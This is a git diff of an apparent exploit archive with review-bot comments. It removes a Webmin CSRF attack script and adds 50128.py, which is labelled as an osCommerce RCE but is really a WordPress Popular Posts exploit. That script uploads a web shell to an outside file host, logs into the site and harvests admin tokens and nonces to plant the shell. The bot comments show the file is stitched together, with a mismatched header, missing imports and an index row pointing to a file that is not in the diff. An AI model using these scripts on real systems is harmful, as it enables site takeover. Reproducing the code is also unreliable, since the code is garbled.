diff --git a/exploits/linux/webapps/50126.py b/exploits/linux/webapps/50126.py deleted file mode 100755 index 30c9c6946..000000000 --- a/exploits/linux/webapps/50126.py +++ /dev/null @@ -1,230 +0,0 @@ -# Exploit Title: Webmin 1.973 - Cross-Site Request Forgery (CSRF) -# Date: 24/04/2021 -# Exploit Author: *Mesh3l_911 & Z0ldyck -# Vendor Homepage: https://www.webmin.com -# Repo Link: https://github.com/Mesh3l911/CVE-2021-31762 -# Version: Webmin 1.973 -# Tested on: All versions <= 1.973 -# CVE : CVE-2021-31762 -# POC: https://youtu.be/qCvEXwyaF5U - - -import time, subprocess - -print('''\033[1;37m - - __ __ _ ____ _ _________ _ _ _ -| \/ | | | |___ \| | |___ / _ \| | | | | | -| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ -| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / -| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < -|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/ - __/ | - |___/ - - \033[1;m''') - -for i in range(101): - print( - "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format( - i), "\033[1;36m%\033[1;m", end="") - time.sleep(0.02) -print("\n\n") - -target = input( - "\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m") - -if target.endswith('/'): - target = target + 'acl/save_user.cgi' -else: - target = target + '/acl/save_user.cgi' - - -def CSRF_Generator(): - with open('CSRF_POC.html', 'w') as POC: - POC.write \ - (''' - - -
- - - - - - - - - - - ''') - POC.close() - - print( - "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m") - - - -def main(): - CSRF_Generator() - - -if __name__ == '__main__': - main() \ No newline at end of file diff --git a/exploits/php/webapps/50128.py b/exploits/php/webapps/50128.py new file mode 100755 index 000000000..012c61cfb --- /dev/null +++ b/exploits/php/webapps/50128.py 
@@ -0,0 +1,89 @@ +# Exploit Title: osCommerce 2.3.4.1 - Remote Code Execution (2) +# Vulnerability: Remote Command Execution when /install directory wasn't removed by the admin +# Exploit: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php +# Notes: The RCE doesn't need to be authenticated +# Date: 26/06/2021 +# Exploit Author: Bryan Leong' + +print('') +print('[*] Starting Exploit:') + +''' +Upload file +''' +file_json = requests.post('https://api.bayfiles.com/upload', files={ 'file' : (shell_name, payload)}) +resp = json.loads(file_json.text) +if resp['status']: + urlshort = resp['data']['file']['url']['full'] +else: + print(f'[-] Error:'+ resp['error']['message']) + exit() + +file_uploaded_site = requests.get(urlshort).text +PHP_URL = re.findall(r"(https?://\S+)("+shell_name+")",file_uploaded_site)[0][0] + shell_name + +print(f'[+] Web Shell successfully uploadad at [{PHP_URL}].') + +''' +Authentication: +''' +session = requests.Session() +auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' + +# Header: +header = { + 'Host': target_ip, + 'User-Agent': 'Monies Browser 1.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1' +} + +# Body: +body = { + 'log': username, + 'pwd': password, + 'wp-submit': 'Log In', + 'testcookie': '1' +} + +# Authenticate: +auth = session.post(auth_url, headers=header, data=body) +auth_header = auth.headers['Set-Cookie'] +if 'wordpress_logged_in' in auth_header: + print(f'[+] Authentication successfull as user [{username}] !') +else: + print('[-] Authentication failed ! 
Check username and password') + exit() + +''' +Verify that the requirements are installed +''' +settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=debug' +settings_page = session.get(settings_page_url).text +search_string = ' gd' +if settings_page.find(search_string) == -1 : + print('[-] Error, gd extension for PHP is not installed/enabled on the server ! WPP can\'t generate thumbnails.') + exit() + +''' +Get the wpp-admin-token +''' +settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools' + +settings_page = session.get(settings_page_url).text +search_string = '' +settings_page = settings_page[settings_page.find(search_string):] +wpp_admin_token = settings_page[72: settings_page.find(search_string_end)] +if wpp_admin_token: + print(f'[+] Acquired wpp-admin-token [{wpp_admin_token}].') +else: + print('[-] Error while gathering wpp-admin-token !') + exit() + +''' +Apply changes to the Popular Posts plugin +''' +body = { + 'upload_thumb_src': '', + 'thumb_source': 'custom_field', + 'thumb_lazy_load': 1, + 'thumb_field': 'wpp_thumbnail', + 'thumb_field_resize': 1, + 'section': 'thumb', + 'wpp-admin-token': wpp_admin_token +} +applied_changes = session.post(settings_page_url, headers=header, data=body).text +if applied_changes.find('
Settings saved.'):
+ print(f'[+] Settings applied successfully to the Popular Posts plugin. ')
+else:
+ print('[-] Error while applying settings o the Popular Posts plugin!')
+ exit()
+
+'''
+Empty image cache
+'''
+body = {
+ 'action': 'wpp_clear_thumbnail',
+ 'wpp-admin-token': wpp_admin_token
+}
+applied_changes = session.post(settings_page_url, headers=header, data=body).text
+print(f'[+] Images cache cleared. ')
+
+
+'''
+Get the new post ID and Nonce
+'''
+new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/post-new.php'
+
+new_post_page = session.get(new_post_url).text
+search_string = 'name="_ajax_nonce-add-meta" value="'
+search_string_end = '" />'
+new_post_page = new_post_page[new_post_page.find(search_string)+35:]
+ajax_nonce = new_post_page[:new_post_page.find(search_string_end)]
+
+search_string = 'wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "'
+search_string_end = '" );'
+new_post_page = new_post_page[new_post_page.find(search_string)+66:]
+wp_nonce = new_post_page[:new_post_page.find(search_string_end)]
+
+search_string = '},"post":{"id":'
+search_string_end = ','
+new_post_page = new_post_page[new_post_page.find(search_string)+15:]
+post_ID = new_post_page[:new_post_page.find(search_string_end)]
+
+if post_ID and wp_nonce and ajax_nonce:
+ print(f'[+] Acquired new post ID [{post_ID}], WP Nonce [{wp_nonce}] and AJAX Nonce [{ajax_nonce}].')
+else:
+ if not post_ID: print('[-] Error while gathering post_ID !')
+ elif not wp_nonce: print('[-] Error while gathering Wordpress Nonce !')
+ elif not ajax_nonce : print('[-] Error while gathering Wordpress AJAX Nonce !')
+ exit()
+
+'''
+Publish a new post
+'''
+new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wp/v2/posts/'+post_ID+'?_locale=user'
+
+data = {"id":post_ID,"title":"I'm the one who knocks","content":"\n upgrade your plugins Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/wordpress-popular-posts/' + post_ID +'_'+ shell_name)
+print('')
\ No newline at end of file
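Review bot: The header comment at the top of this hunk describes an osCommerce 2.3.4.1 install.php exploit, but the body that follows is a WordPress script — it builds `wp-admin/post-new.php` and `index.php/wp-json/wp/v2/posts/` URLs and extracts a Popular Posts `wpp-admin-token` — which files_exploits.csv in this same diff attributes to 50129, not 50128. Either the wrong script was committed under 50128.py or two files were merged during extraction; the file and its catalog row should be reconciled before this lands. Within the visible lines `requests`, `json` and `re` are used with no import, and `target_ip`, `target_port`, `wp_path`, `username`, `password`, `shell_name` and `payload` are read without any visible definition, so as shown the script would fail at the first call unless those lines were collapsed out of view in this rendering.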
diff --git a/files_exploits.csv b/files_exploits.csv
index b9ebb371d..0312d7284 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -26042,7 +26042,6 @@ id,file,description,date,author,type,platform,port
12866,exploits/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,webapps,php,
12867,exploits/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,webapps,php,
12868,exploits/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,webapps,php,
-50126,exploits/linux/webapps/50126.py,"Webmin 1.973 - Cross-Site Request Forgery (CSRF)",2021-07-14,Mesh3l_911,webapps,linux,
49439,exploits/php/webapps/49439.txt,"Life Insurance Management System 1.0 - 'client_id' SQL Injection",2021-01-18,"Aitor Herrero",webapps,php,
49440,exploits/php/webapps/49440.txt,"Life Insurance Management System 1.0 - File Upload RCE (Authenticated)",2021-01-18,"Aitor Herrero",webapps,php,
49441,exploits/php/webapps/49441.txt,"osTicket 1.14.2 - SSRF",2021-01-19,"Talat Mehmood",webapps,php,
@@ -44263,3 +44262,5 @@ id,file,description,date,author,type,platform,port
50122,exploits/php/webapps/50122.rb,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)",2021-07-13,"Alexandre ZANNI",webapps,php,
50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",2021-07-13,"Luca Bernardi",webapps,php,
50127,exploits/php/webapps/50127.txt,"WordPress Plugin Current Book 1.0.1 - 'Book Title and Author field' Stored Cross-Site Scripting (XSS)",2021-07-14,"Vikas Srivastava",webapps,php,
+50128,exploits/php/webapps/50128.py,"osCommerce 2.3.4.1 - Remote Code Execution (2)",2021-07-15,"Bryan Leong",webapps,php,
+50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",2021-07-15,"Simone Cristofaro",webapps,php,
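Review bot: The second added row registers `exploits/php/webapps/50129.py`, but this diff only adds `exploits/php/webapps/50128.py`; git orders file sections by path, so 50129.py would have appeared before files_exploits.csv had it been part of this commit. Unless that script arrives in a separate commit, the index now points at a file that is not in the tree. The description on the 50128 row (`osCommerce 2.3.4.1 - Remote Code Execution (2)`) should also be checked against the committed 50128.py, whose body in this diff targets the WordPress Popular Posts plugin rather than osCommerce.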